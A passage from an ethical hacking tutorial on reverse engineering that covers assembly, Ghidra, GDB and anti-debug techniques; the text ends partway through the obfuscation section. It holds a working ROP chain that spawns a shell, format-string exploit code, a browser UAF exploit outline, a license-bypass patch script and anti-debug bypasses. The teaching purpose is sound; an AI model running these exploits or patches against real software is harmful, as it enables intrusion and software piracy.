Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

@scipio 70

about 1 month ago

StemSocial

What will I learn

What reverse engineering is and why it is essential for vulnerability research and malware analysis;
Static analysis -- reading disassembled code without executing it, using Ghidra and objdump;
Dynamic analysis -- running binaries under a debugger to observe behavior in real time;
x86/x64 assembly essentials -- the instructions you need to read disassembly productively;
Ghidra -- the NSA's free reverse engineering tool and how to use the decompiler effectively;
Patching binaries -- modifying compiled programs to change behavior;
Anti-reversing techniques -- obfuscation, packing, and anti-debug tricks;
Defense: code signing, integrity checks, obfuscation as a defense layer.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
Ghidra installed (https://ghidra-sre.org/);
GDB with pwndbg or GEF;
Understanding of memory layout from episodes 42-43;
The ambition to learn ethical hacking and security research.

Difficulty

Advanced

Curriculum (of the `Learn Ethical Hacking Series`):

from pwn import *

elf = ELF('./vuln')

# Gadgets found with ROPgadget:

pop_eax = 0x080b81c6 # pop eax; ret
pop_ebx = 0x080481c9 # pop ebx; ret
pop_ecx = 0x080e5571 # pop ecx; ret
pop_edx = 0x0806ec0a # pop edx; ret
int_80 = 0x0806c943 # int 0x80

# execve("/bin/sh", NULL, NULL) = syscall 11

binsh = next(elf.search(b'/bin/sh'))

payload = b'A' * 76
payload += p32(pop_eax) + p32(11) # eax = 11 (execve)
payload += p32(pop_ebx) + p32(binsh) # ebx = "/bin/sh"
payload += p32(pop_ecx) + p32(0) # ecx = NULL
payload += p32(pop_edx) + p32(0) # edx = NULL
payload += p32(int_80) # syscall

p = process('./vuln')
p.sendline(payload)
p.interactive()

# Shell spawned via execve syscall


The essential insight is that each `pop REG; ret` gadget loads one value from the stack into a register and then returns to the next gadget address on the stack. You're programming the CPU one register at a time, using the stack as your instruction sequence. The ROP chain is effectively a program written in stack layout rather than in machine code -- DEP is completely bypassed because you never execute from the stack, you just read data from it. The `int 0x80` at the end is the only "real" instruction that matters -- everything before it was just setup, loading the right values into the right registers so the kernel performs `execve("/bin/sh", NULL, NULL)`.
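To make the "program written in stack layout" idea concrete, here is a minimal sketch that rebuilds the same chain with only the standard library and prints it one 32-bit word at a time. The gadget addresses are the ones listed above; the `/bin/sh` address is a made-up placeholder (in the real exploit it comes from `elf.search`), and the helper names are mine.

```python
import struct

# Gadget addresses from the ROPgadget output above
POP_EAX = 0x080b81c6  # pop eax; ret
POP_EBX = 0x080481c9  # pop ebx; ret
POP_ECX = 0x080e5571  # pop ecx; ret
POP_EDX = 0x0806ec0a  # pop edx; ret
INT_80 = 0x0806c943   # int 0x80

BINSH = 0x080be408    # HYPOTHETICAL address of "/bin/sh", for illustration only
PADDING = 76          # bytes before the saved return address, as in the payload above


def p32(value):
    """Pack a 32-bit little-endian word (the default behaviour of pwntools' p32)."""
    return struct.pack("<I", value)


def build_chain():
    """Return (word, meaning) pairs in the order they sit on the stack."""
    return [
        (POP_EAX, "gadget: pop eax; ret"),
        (11, "value popped into eax (execve syscall number)"),
        (POP_EBX, "gadget: pop ebx; ret"),
        (BINSH, "value popped into ebx (pointer to /bin/sh)"),
        (POP_ECX, "gadget: pop ecx; ret"),
        (0, "value popped into ecx (NULL)"),
        (POP_EDX, "gadget: pop edx; ret"),
        (0, "value popped into edx (NULL)"),
        (INT_80, "gadget: int 0x80"),
    ]


def build_payload():
    """Padding followed by the packed chain."""
    return b"A" * PADDING + b"".join(p32(word) for word, _ in build_chain())


def describe():
    """One line per stack slot: payload offset, word, meaning."""
    return [
        f"+{PADDING + 4 * i:3d}  0x{word:08x}  {meaning}"
        for i, (word, meaning) in enumerate(build_chain())
    ]


for line in describe():
    print(line)
```

Reading the printed table top to bottom is reading the "program": gadget addresses and the values they pop alternate until `int 0x80` fires.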

**Exercise 2:** Format string exploitation.

```python
from pwn import *

p = process('./fmtvuln')

# Step 1: Leak 8 stack values (the AAAA marker lets us spot our own input)
p.sendline(b'AAAA' + b'%08x.' * 8)
leaked = p.recvline().decode().strip()
# Output: AAAAbffff6a0.00000064.f7c48150.00000000.41414141.78383025...
# Our input "AAAA" (0x41414141) appears at offset 5

# Step 2: Direct parameter access to confirm offset
p = process('./fmtvuln')
p.sendline(b'AAAA%5$08x')
result = p.recvline().decode().strip()
# Output: AAAA41414141 -- confirmed position 5

# Step 3: Read arbitrary address using %s
p = process('./fmtvuln')
target_addr = p32(0xf7c48150)
p.sendline(target_addr + b'%5$s')
# Reads the string at address 0xf7c48150
# (whatever is stored at that libc address)
```

Format strings are a dual-use primitive -- the same vulnerability that leaks stack values with %x (for ASLR bypass) can also read arbitrary memory when you combine %s with an address you placed on the stack. The offset discovery (position 5 in this case) is the critical step because it tells you exactly which stack position your input occupies, which lets you use direct parameter access (%5$x, %5$s, %5$n) to target specific values without dumping everything in between. The %n write primitive (not shown in full here -- see episode 43's format string section) completes the picture: read with %s, write with %n, all from a single printf(user_input) vulnerability.
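The offset discovery can be automated. The sketch below is one possible way to do it, not the method from episode 43: it takes the dotted hex dump produced by a `%08x.` probe, finds the position holding the marker, and builds the matching direct-access specifier. The function names are illustrative, and the sample leak reuses the values shown above.

```python
def find_offset(leak, marker=b"AAAA", sep="."):
    """Return the 1-based printf argument position whose value equals the marker.

    `leak` is the text printed by a probe such as '%08x.' repeated N times.
    Returns None when the marker does not show up in the dump.
    """
    wanted = int.from_bytes(marker, "little")  # b"AAAA" -> 0x41414141
    fields = leak.strip(sep).split(sep)
    for position, field in enumerate(fields, start=1):
        try:
            if int(field, 16) == wanted:
                return position
        except ValueError:
            continue  # skip anything that is not a hex number
    return None


def direct_access(position, conversion):
    """Build a direct parameter access specifier, e.g. (5, 's') -> '%5$s'."""
    return f"%{position}${conversion}"


sample_leak = "bffff6a0.00000064.f7c48150.00000000.41414141."
offset = find_offset(sample_leak)
print(offset, direct_access(offset, "s"))
```

With the offset known, the same helper produces the read (`%5$s`) and write (`%5$n`) specifiers without another probing round.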

**Exercise 3:** UAF case study.

CVE-2024-4947 (Chrome V8 Type Confusion / UAF)

Vulnerability: Type confusion in the V8 Maglev JIT compiler.
The Maglev compiler incorrectly handled certain JavaScript
object types during JIT compilation, allowing type confusion
between objects with different memory layouts.

What gets freed: A JIT-compiled code object is freed during
garbage collection while a stale pointer to it still exists
in the optimized code path.

Exploit strategy:
1. Trigger Maglev JIT compilation on crafted JavaScript
2. Force garbage collection to free the JIT code object
3. Reallocate the freed memory with an ArrayBuffer containing
   attacker-controlled data
4. The stale pointer now references attacker data instead of
   the original code object
5. When the JIT code path executes, it reads function pointers
   from attacker-controlled memory -> arbitrary code execution

Patch: Added proper GC rooting for Maglev code objects so they
cannot be collected while references exist in optimized code.

Mitigations bypassed:
- V8 sandbox (partial bypass via sandbox escape primitive)
- Site isolation (bypassed because exploit runs within
  renderer process, not across site boundaries)
- ASLR (bypassed via V8 heap address leak)

Exploited in the wild as a 0-day by an APT group before the patch.
Rated CVSS 8.8 (High).

This CVE demonstrates the pattern that dominates modern browser exploitation: the vulnerability is not a simple buffer overflow but a type confusion in the JIT compiler -- one of the most complex components in any browser. The exploit requires understanding V8's object layout, garbage collection timing, and Maglev's optimization pipeline. The patch was a single line of code (adding a GC root), but finding the vulnerability required deep knowledge of how the JIT compiler manages memory during optimization passes.

Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries

Episode 43 covered the advanced side of exploit development -- ROP chains for bypassing DEP/NX by chaining existing code gadgets instead of injecting shellcode, ASLR bypass through GOT leaking where you use puts() to print a libc address and then calculate where everything else lives, stack canary bypass via format string leaks, format string vulnerabilities as both read AND write primitives, heap exploitation with use-after-free and double free, heap spraying as the probabilistic approach to hitting your payload, and full exploit chains that combine canary leak + address leak + ROP to defeat a binary with all protections enabled. You can now construct multi-stage exploits against hardened binaries using pwntools, and you understand why defense-in-depth works -- not because any single layer is unbreakable, but because breaking all of them simultaneously requires a level of vulnerability complexity that most software simply doesn't have.

But here's the thing about episodes 42 and 43: we always had the source code. We wrote vulnerable.c ourselves, compiled it, and then exploited it. We knew exactly where the strcpy was. We knew the buffer size. We knew the stack layout because we designed it. In the real world, you almost never have that luxury. The software you're auditing is a compiled binary -- an .exe, an ELF executable, a .dylib -- and the only tools standing between you and understanding it are a hex editor and a disassembler.

This episode is about reading binaries without source code. Reverse engineering is the skill that connects exploit development (episodes 42-43) to real-world vulnerability research -- because before you can exploit a bug, you need to FIND it, and in closed-source software, finding it means reading assembly.

Here we go.

What Reverse Engineering Actually Is

Reverse engineering is the process of analyzing a compiled program to understand what it does, how it does it, and where it goes wrong -- all without access to the original source code. You take the output of a compiler (machine code) and work backwards to reconstruct the logic, data structures, and control flow that the programmer intended.

Three main use cases drive reverse engineering in security:

Vulnerability research -- finding exploitable bugs in proprietary software. If Adobe Reader, Microsoft Office, or a firmware update has a buffer overflow, someone has to find it. That someone reads the disassembly.
Malware analysis -- understanding what a piece of malware does, how it communicates with its command and control infrastructure, what data it steals, and how to detect or neutralize it. Every threat intelligence report you've ever read started with someone reverse engineering a binary.
Protocol and format analysis -- understanding proprietary file formats, network protocols, or DRM implementations. How does a game's anti-cheat system work? What data does this IoT device send home? How does this VPN client establish its tunnel? The answers are in the binary.

There are two fundamental approaches: static analysis (examining the binary without running it) and dynamic analysis (running the binary and observing its behavior). In practice, you use both -- static analysis to build a map of what the code does, dynamic analysis to verify your understanding and observe runtime state. They are complementary, not competing techniques.

x86 Assembly -- The Minimum You Need

You do not need to become an assembly language expert to do reverse engineering. What you need is pattern recognition -- the ability to look at a sequence of instructions and recognize "that's an if-statement" or "that's a function call with a return value check" without parsing every individual opcode. Here are the instructions that account for roughly 90% of what you'll encounter:

; Data movement
mov eax, ebx        ; copy ebx into eax
mov eax, [ebx]      ; load value from memory address in ebx
mov [eax], ebx      ; store ebx at memory address in eax
lea eax, [ebx+4]    ; load effective address (pointer math, no memory access)
push eax            ; push onto stack (ESP decrements)
pop eax             ; pop from stack (ESP increments)

; Arithmetic
add eax, 4          ; eax = eax + 4
sub eax, 4          ; eax = eax - 4
xor eax, eax        ; eax = 0 (common idiom for zeroing a register)
inc eax             ; eax++
dec eax             ; eax--
imul eax, ebx       ; eax = eax * ebx (signed multiply)

; Comparison and branching
cmp eax, 0          ; compare eax with 0 (sets CPU flags)
test eax, eax       ; AND eax with itself, flags only (zero check, shorter encoding than cmp eax, 0)
je  label           ; jump if equal (ZF=1)
jne label           ; jump if not equal
jg  label           ; jump if greater (signed)
jl  label           ; jump if less (signed)
ja  label           ; jump if above (unsigned)
jb  label           ; jump if below (unsigned)
jmp label           ; unconditional jump

; Function calls
call function       ; push return address, jump to function
ret                 ; pop return address, jump to it
leave               ; mov esp, ebp; pop ebp (function epilogue)

; x86-64 calling convention (System V AMD64 ABI -- Linux):
; Arguments: rdi, rsi, rdx, rcx, r8, r9 (then stack)
; Return value: rax
; Caller-saved: rax, rcx, rdx, rsi, rdi, r8, r9, r10, r11
; Callee-saved: rbx, rbp, r12-r15

The pattern recognition part is what matters most. When you see cmp eax, 0 followed by je somewhere, that's an if (x == 0) branch. When you see call some_function followed by test eax, eax and then jne error_path, that's a function call with a "did it succeed?" check. When you see mov [rbp-0x10], rdi at the start of a function, that's saving the first argument to a local variable. You don't need to memorize every instruction encoding -- you need to recognize these high-level patterns quickly enough that you can read disassembly at something approaching the speed of reading C code.
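The "call, then test, then conditional jump" pattern is regular enough to match mechanically. The following is a toy sketch under simplifying assumptions: instructions arrive as already-parsed `(mnemonic, operands)` tuples (a format I made up for illustration, not the output of any particular disassembler), and only the zero-check on `eax` is recognized.

```python
# Instruction pairs that check whether eax is zero
ZERO_TESTS = {("test", "eax, eax"), ("cmp", "eax, 0")}

# Conditional jumps that act on the zero flag, and when they are taken
BRANCHES = {"je": "zero", "jz": "zero", "jne": "non-zero", "jnz": "non-zero"}


def find_return_checks(instructions):
    """Find 'call X; test eax, eax; jcc label' sequences.

    `instructions` is a list of (mnemonic, operands) tuples.
    Returns one human-readable description per match.
    """
    findings = []
    for i in range(len(instructions) - 2):
        (m0, o0), (m1, o1), (m2, o2) = instructions[i:i + 3]
        if m0 == "call" and (m1, o1) in ZERO_TESTS and m2 in BRANCHES:
            findings.append(
                f"call {o0}: branch to {o2} if result is {BRANCHES[m2]}"
            )
    return findings


listing = [
    ("mov", "rdi, rax"),
    ("call", "check_license"),
    ("test", "eax, eax"),
    ("jne", "error_path"),
    ("mov", "eax, 1"),
]
for finding in find_return_checks(listing):
    print(finding)
```

Your eyes do the same thing after enough practice; the point of the sketch is only that the pattern is a fixed three-instruction shape, not something that needs opcode-level parsing.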

The x86-64 calling convention (on Linux -- Windows uses a different one) is especially important because it tells you where function arguments live. If you see a mov rdi, some_value right before a call, the value being put in rdi is the first argument to that function. If the function is strcmp, that first argument is a string being compared. If the function is malloc, that first argument is the allocation size. Knowing the calling convention lets you read function calls almost as clearly as if you had the source code.
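As a quick reference, the register order can be written down as a lookup. This is a minimal sketch covering only integer and pointer arguments under the System V AMD64 convention (floating-point arguments travel in xmm registers and are not modeled here); the function name is mine.

```python
# Integer/pointer argument registers, in order (System V AMD64, Linux)
INT_ARG_REGS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")


def arg_location(index):
    """Where the caller places integer/pointer argument `index` (0-based).

    The first six go in registers; the rest are on the stack, with the
    seventh argument at [rsp] at the moment the call instruction executes.
    """
    if index < 0:
        raise ValueError("argument index must be non-negative")
    if index < len(INT_ARG_REGS):
        return INT_ARG_REGS[index]
    stack_slot = 8 * (index - len(INT_ARG_REGS))
    return f"[rsp+{stack_slot}] at the call site"


# strcmp(a, b): a is in rdi, b is in rsi
for i, name in enumerate(["a", "b"]):
    print(f"strcmp argument {name} -> {arg_location(i)}")
```

So when a breakpoint on `strcmp` fires, the two strings being compared are the ones pointed to by `rdi` and `rsi`.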

Static Analysis with Ghidra

Ghidra (https://ghidra-sre.org/) is the NSA's reverse engineering framework, released as open source in 2019. Before Ghidra, the industry standard was IDA Pro -- an excellent tool that costs $2,765/year for a named license. Ghidra is free, open source, and has one killer feature that makes it competitive with IDA: the decompiler. The decompiler takes raw assembly and produces C-like pseudocode that is (usually) dramatically easier to read than the raw instructions.

# Download and install Ghidra (requires a 64-bit JDK: 17 or 21, depending on the Ghidra release)
# https://ghidra-sre.org/
# Extract, run:
./ghidraRun

# Workflow:
# 1. File -> New Project -> Non-Shared Project
# 2. File -> Import File -> select your binary
# 3. When prompted "Analyze?", click Yes (auto-analysis)
# 4. Wait for analysis to complete (progress bar at bottom)
# 5. Navigate: Functions window (left) shows all discovered functions
# 6. Double-click a function to see disassembly (center panel)
# 7. Decompiler output appears in the right panel automatically

Reading Ghidra's Decompiler Output

The decompiler is where Ghidra really shines. Here is what a license check function might look like in the decompiler versus the raw disassembly:

// Ghidra decompiler output for check_license()
// Variable names are auto-generated (local_48, param_1)
// Types are inferred (sometimes wrong)

int check_license(char *param_1) {
    int iVar1;
    char local_48[64];

    strcpy(local_48, param_1);     // BUFFER OVERFLOW -- 64 byte buffer,
                                    // no bounds check on param_1
    iVar1 = strcmp(local_48, "VALID-LICENSE-KEY-2026");
    if (iVar1 == 0) {
        puts("License valid!");
        return 1;
    }
    puts("Invalid license.");
    return 0;
}

Compare that to reading the same function in raw assembly -- 40+ instructions of mov, lea, push, call, test, je. The decompiler compressed all of that into 10 lines of readable pseudocode. You can immediately see the vulnerability: strcpy with no bounds checking on a 64-byte stack buffer. The same bug we exploited in episode 42, but discovered through reverse engineering instead of source code review.

Ghidra's decompiler is not perfect -- the auto-generated variable names (local_48, iVar1, param_1) are meaningless, types are sometimes wrong (it might call a char* an int*), and complex code with heavy optimization can produce confusing output. But it turns a 200-instruction function into 15 lines of C that you can actually analyze for vulnerabilities, and that transformation is the difference between spending 3 hours on a function and spending 15 minutes.

Nota bene: You can rename variables and add type annotations in Ghidra. Right-click a variable, select "Rename Variable" or "Retype Variable." As you reverse engineer a binary, you gradually annotate functions with meaningful names -- local_48 becomes user_buffer, param_1 becomes license_input, and the function itself gets renamed from FUN_00401230 to check_license. This annotation process is the core workflow of professional reverse engineering.

Strings Analysis -- The First Thing You Do

Before diving into disassembly, the very first thing you should do with any unknown binary is look at its strings. Strings embedded in a binary reveal an enormous amount of information -- error messages, log messages, API endpoints, hardcoded credentials, file paths, and command names:

# Extract printable strings (minimum 4 chars)
strings binary | head -50

# Search for interesting patterns
strings binary | grep -i "password\|key\|secret\|flag\|admin\|token"
strings binary | grep -i "http://\|https://\|ftp://"
strings binary | grep -i "error\|fail\|denied\|invalid"

# In Ghidra: Window -> Defined Strings
# Sort by string content, double-click to jump to the cross-reference
# (where in the code this string is used)

# Real-world example: strings on a suspicious binary
$ strings suspicious.bin | grep -i "http"
http://cdn-update.totally-legit.com/api/v2/beacon
http://backup-c2.evil-domain.xyz/heartbeat
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

$ strings suspicious.bin | grep -i "cmd\|shell\|exec"
cmd.exe /c
powershell -enc
CreateProcessA
ShellExecuteA

$ strings suspicious.bin | grep -i "reg\|persist"
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER

Those strings alone strongly suggest that this binary contacts two C2 servers, uses a legitimate-looking User-Agent for disguise, can spawn cmd.exe and PowerShell, and writes to the Windows Run registry key for persistence. You haven't opened a disassembler yet and you already have a solid working hypothesis about what this thing does. Strings analysis is the lowest-effort, highest-reward technique in reverse engineering.
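If you want the same triage inside a script (for example to process a folder of samples), a rough stand-in for `strings | grep` fits in a few lines. This is a sketch, not a reimplementation of GNU strings: it only handles printable ASCII runs, and the category keywords are my own picks based on the greps above.

```python
import re


def extract_strings(data, min_len=4):
    """Return printable-ASCII runs of at least `min_len` bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


# Keyword groups (lowercase), loosely mirroring the grep patterns above
CATEGORIES = {
    "network": ("http://", "https://", "ftp://"),
    "execution": ("cmd", "shell", "exec"),
    "persistence": ("currentversion\\run", "hkey_"),
}


def triage(strings):
    """Group strings by the first-look categories they hit."""
    hits = {name: [] for name in CATEGORIES}
    for text in strings:
        lowered = text.lower()
        for name, needles in CATEGORIES.items():
            if any(needle in lowered for needle in needles):
                hits[name].append(text)
    return hits


# A made-up blob standing in for the contents of suspicious.bin
blob = (
    b"\x00\x01http://backup-c2.evil-domain.xyz/heartbeat\x00\xff"
    b"cmd.exe /c\x00\x02\x03"
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00ab\x00"
)
for category, found in triage(extract_strings(blob)).items():
    print(category, found)
```

For a real file, read it with `open(path, "rb").read()` and pass the bytes to `extract_strings`.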

In Ghidra, every string has cross-references (xrefs) -- locations in the code that reference that string. Double-click a string like "Invalid license." and Ghidra shows you exactly which function uses it. Follow the xref, and you're looking at the license check function. Follow the cross-references of the function, and you see where it's called from. This "follow the strings" technique is how most reverse engineers navigate a large binary -- you don't read it linearly from start to finish, you find interesting strings and trace backwards to the code that uses them.

Dynamic Analysis with GDB

Static analysis tells you what the code says. Dynamic analysis tells you what the code does. Sometimes these are different -- heavily obfuscated code, self-modifying code, or packed binaries can look incomprehensible in a static disassembler but behave straightforwardly when you actually run them and watch what happens.

GDB (GNU Debugger) is the standard dynamic analysis tool on Linux. We used it in episodes 42-43 for exploit development, but for reverse engineering the workflow is different -- instead of trying to crash the program, you're trying to understand it:

# Load the binary in GDB
gdb ./target_binary

# Set a breakpoint at main (a stripped binary has no main symbol;
# use starti there to stop at the very first instruction instead)
(gdb) break main
(gdb) run

# Step through execution
(gdb) ni            # next instruction (step OVER function calls)
(gdb) si            # step instruction (step INTO function calls)
(gdb) finish        # run until current function returns
(gdb) continue      # continue to next breakpoint

# Examine registers and memory
(gdb) info registers         # show all register values
(gdb) x/20x $rsp            # examine 20 hex words at stack pointer
(gdb) x/s $rdi              # examine rdi as a string
(gdb) x/10i $rip            # disassemble 10 instructions at RIP
(gdb) x/20x 0x00404000      # examine memory at a specific address

# Set conditional breakpoints
(gdb) break *0x00401234 if $rax == 0
(gdb) break strcmp           # break on any call to strcmp

# Watch memory for changes (the cast tells GDB how many bytes to watch)
(gdb) watch *(int *)0x00404000      # break when value at this address changes
(gdb) rwatch *(int *)0x00404000     # break when value is READ

Pwndbg/GEF -- GDB on Steroids

Raw GDB is functional but painful. Pwndbg and GEF are GDB extensions that transform it into a proper reverse engineering environment with color-coded output, context display (registers + stack + disassembly + backtrace all visible simultaneously), and dozens of convenience commands:

# Install pwndbg
git clone https://github.com/pwndbg/pwndbg
cd pwndbg && ./setup.sh

# Now every time GDB stops, you see a full context display:
# REGISTERS (color-coded by value type)
# DISASM (current and next instructions)
# STACK (annotated with symbols)
# BACKTRACE (call chain)

# Useful pwndbg commands for reverse engineering:
pwndbg> vmmap             # show full memory map (/proc/pid/maps)
pwndbg> heap              # show heap state (chunks, bins, freelists)
pwndbg> got               # show GOT entries and their resolved addresses
pwndbg> plt               # show PLT entries
pwndbg> checksec          # show binary protections
pwndbg> search -s "flag"  # search memory for a string
pwndbg> telescope 20      # show 20 stack entries with smart annotations
pwndbg> xinfo $rdi        # show what memory region an address belongs to

# Practical RE workflow with pwndbg:
# 1. Run the binary, observe its behavior
# 2. Set breakpoints at interesting functions (identified via Ghidra)
# 3. Step through, watching register values and memory state
# 4. When you hit a comparison (cmp/test + conditional jump),
#    examine what's being compared -- this often reveals passwords,
#    license keys, or validation logic

# Example: reversing a password check
pwndbg> break strcmp
pwndbg> run
# The program asks for a password, type anything
# Breakpoint hit at strcmp:
#   RDI: "your_input_here"
#   RSI: "s3cr3t_p4ssw0rd!"    <-- there's your answer

That last example -- breaking on strcmp to see what your input is being compared against -- is one of the most effective dynamic analysis techniques. If the program uses strcmp, strncmp, or memcmp to validate input, you can see both arguments by setting a breakpoint on the library function and examining rdi (first argument) and rsi (second argument). The password, license key, or expected input is sitting right there, one pointer dereference away ;-) This works however obfuscated the surrounding code is, provided the comparison actually goes through a library call: an inlined comparison, a statically linked and stripped binary, or a hash comparison will not give the plaintext away this easily.
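The same trick can be scripted with plain GDB in batch mode, which is handy when you want to repeat it across many binaries. The sketch below only builds the command line; it assumes plain `gdb` is on your PATH, that the target reads its password from stdin, and that the first `strcmp` hit is the interesting one (it may not be, since libc can call `strcmp` itself). The function name and file names are placeholders.

```python
import shlex


def gdb_strcmp_command(binary, stdin_file):
    """Build argv for a non-interactive GDB run that stops at the first
    strcmp call and prints both string arguments."""
    gdb_script = [
        "set breakpoint pending on",            # strcmp lives in a library not loaded yet
        "break strcmp",
        f"run < {shlex.quote(stdin_file)}",     # feed the guess via stdin redirection
        "x/s $rdi",                             # first argument
        "x/s $rsi",                             # second argument
    ]
    argv = ["gdb", "-q", "-batch"]
    for command in gdb_script:
        argv += ["-ex", command]
    argv.append(binary)
    return argv


argv = gdb_strcmp_command("./target_binary", "guess.txt")
print(" ".join(shlex.quote(part) for part in argv))
```

Pass the resulting list to `subprocess.run(argv, capture_output=True, text=True)` to execute it and collect the two printed strings.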

Patching Binaries

Sometimes you don't need to understand the entire binary -- you just need to change one decision. A license check that returns 0 (fail) when it should return 1 (pass). A function call that enforces a trial period. A conditional jump that sends you to the "access denied" path when you want the "access granted" path.

Binary patching modifies specific bytes in the compiled program to change its behavior:

# Example: bypass a license check
# The original disassembly at the critical decision point:
#
#   0x00401234: call check_license
#   0x00401239: test eax, eax
#   0x0040123b: je   0x00401260    <-- jumps to FAIL if eax == 0
#   0x0040123d: ...                 <-- SUCCESS path continues here
#   ...
#   0x00401260: ...                 <-- FAIL path

# Option 1: Change JE (jump if equal/zero) to JNE (jump if not equal)
# JE  opcode = 0x74
# JNE opcode = 0x75
# Single byte change: the logic is now inverted

# Option 2: NOP out the jump entirely
# Replace the JE instruction (2 bytes: 0x74 0x23) with two NOPs (0x90 0x90)
# The program falls through to the success path regardless of the check

# Option 3: Patch the function to always return 1
# Change the first instruction of check_license to:
#   mov eax, 1
#   ret
# Bytes: B8 01 00 00 00 C3
# The function always returns success without executing any check logic

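#!/usr/bin/env python3
"""patch_binary.py -- binary patching example"""
import os

# File offset of the JE instruction (bytes 0x74 0x23) in target_binary
# (offset found via Ghidra: click the instruction, look at the
#  file offset in the bottom status bar)
JE_OFFSET = 0x123b

# Read the original binary
with open('target_binary', 'rb') as f:
    data = bytearray(f.read())

# Refuse to patch if the expected bytes are not there -- a wrong
# offset would silently corrupt unrelated code
if data[JE_OFFSET:JE_OFFSET + 2] != b'\x74\x23':
    raise SystemExit('unexpected bytes at patch offset, aborting')

# Patch: NOP out the conditional jump
data[JE_OFFSET:JE_OFFSET + 2] = b'\x90\x90'

# Write the patched binary
with open('target_binary_patched', 'wb') as f:
    f.write(data)

# Make it executable
os.chmod('target_binary_patched', 0o755)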

In Ghidra, you can patch directly: right-click an instruction, select Patch Instruction, and type the new instruction. Ghidra calculates the byte encoding for you. Then export the patched binary via File -> Export Program -> Original File.
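If you are wondering where the second byte of the jump (0x23) comes from: a short conditional jump stores a signed 8-bit displacement measured from the address of the next instruction. A small sketch of that arithmetic, using the addresses from the disassembly above (the helper name is mine):

```python
JE = 0x74   # jump if equal / zero
JNE = 0x75  # jump if not equal / not zero
NOP = 0x90


def encode_short_jcc(opcode, address, target):
    """Encode a 2-byte short conditional jump located at `address`.

    The displacement is relative to the end of the instruction,
    i.e. address + 2, and must fit in a signed byte.
    """
    displacement = target - (address + 2)
    if not -128 <= displacement <= 127:
        raise ValueError("target out of range for a short jump")
    return bytes([opcode, displacement & 0xFF])


original = encode_short_jcc(JE, 0x0040123b, 0x00401260)
inverted = encode_short_jcc(JNE, 0x0040123b, 0x00401260)
nopped = bytes([NOP]) * len(original)

print(original.hex(), inverted.hex(), nopped.hex())
```

Options 1 and 2 above differ only in which of these two-byte sequences ends up at the patch location.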

A word of caution: patching is a blunt instrument. It works for simple validation bypasses, but if the check result is used later in the program (e.g., the return value determines which encryption key is used to decrypt subsequent data), a simple patch can break the program in subtle ways. Always test patched binaries thoroughly. And obviously, patching commercial software to bypass licensing is illegal in most jurisdictions -- we're discussing this for vulnerability research and CTF purposes, where understanding binary modification is a core skill.
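One practical trap when patching by hand: the addresses in a disassembly are virtual addresses, while a patch script needs file offsets. For ELF files the mapping lives in the PT_LOAD program headers. The sketch below handles only 64-bit little-endian ELF images and takes the file contents as bytes; it is meant to show the arithmetic rather than to replace a proper ELF library, and the function name is my own.

```python
import struct

PT_LOAD = 1  # program header type for loadable segments


def va_to_file_offset(elf, vaddr):
    """Translate a virtual address to a file offset via PT_LOAD headers.

    `elf` is the raw file content (bytes) of a 64-bit little-endian ELF.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF")

    # ELF64 header fields: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)

    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        # Elf64_Phdr starts with: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz
        p_type, _flags, p_offset, p_vaddr, _paddr, p_filesz = struct.unpack_from(
            "<IIQQQQ", elf, base
        )
        if p_type == PT_LOAD and p_vaddr <= vaddr < p_vaddr + p_filesz:
            return p_offset + (vaddr - p_vaddr)

    raise ValueError("address is not backed by file data in any PT_LOAD segment")
```

Usage would look like `va_to_file_offset(open('target_binary', 'rb').read(), 0x40123b)`. For a non-PIE binary whose code segment maps file offset 0x1000 at 0x401000, that returns 0x123b, but other layouts give different results, which is why checking the bytes before patching is worth the extra line.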

Anti-Reversing Techniques

Software authors use various techniques to make reverse engineering harder. Understanding these techniques is essential because you will encounter them constantly -- especially in malware, DRM implementations, and commercial software:

# 1. Symbol stripping
strip binary
# Removes function names, variable names, and debug information
# Before: you see check_license, validate_input, main
# After: you see FUN_00401000, FUN_00401200, entry
# Ghidra still works -- it uses heuristic function detection
# (looking for function prologues like push rbp; mov rbp, rsp)
# but navigation is much harder without meaningful names

# 2. Packing / compression
upx --best binary
# UPX compresses the entire binary and adds a small decompression
# stub that unpacks the original code into memory at runtime.
# In Ghidra: you see the UPX stub code, not the real program.
# The real code only exists in memory after unpacking.
#
# UPX is trivially reversible:
upx -d packed_binary    # decompress back to original
#
# Commercial packers (Themida, VMProtect, Enigma Protector) are
# NOT trivially reversible. They use:
# - Multiple unpacking layers
# - Anti-debug checks between layers
# - Code virtualization (translate x86 to custom bytecode)
# - Integrity checks that detect tampering

// 3. Anti-debug: ptrace detection (Linux)
#include <stdlib.h>
#include <sys/ptrace.h>

void anti_debug() {
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) {
        // A debugger is already attached -- PTRACE_TRACEME fails
        // because only one tracer is allowed per process
        exit(1);
    }
}

// Bypass methods:
// a) Patch the ptrace call to NOP
// b) Use LD_PRELOAD to override ptrace:
//    LD_PRELOAD=./fake_ptrace.so ./binary
//    where fake_ptrace.so exports ptrace() that always returns 0
// c) In GDB: catch syscall ptrace, continue to the stop at the syscall's
//    return, then set $rax = 0 and continue

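// 4. Timing checks
#include <stdlib.h>
#include <time.h>

void timing_check() {
    struct timespec start, end;
    // Wall-clock time: CPU time from clock() barely advances while
    // the process sits stopped at a breakpoint
    clock_gettime(CLOCK_MONOTONIC, &start);
    // ... some code ...
    clock_gettime(CLOCK_MONOTONIC, &end);
    double elapsed = (end.tv_sec - start.tv_sec)
                   + (end.tv_nsec - start.tv_nsec) / 1e9;
    if (elapsed > 1.0) {
        // Took too long -- probably being single-stepped
        // in a debugger
        exit(1);
    }
}

// Bypass: patch the conditional jump after the timing check
// or use GDB to overwrite the stored timestamps before the comparison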

# 5. Code obfuscation techniques
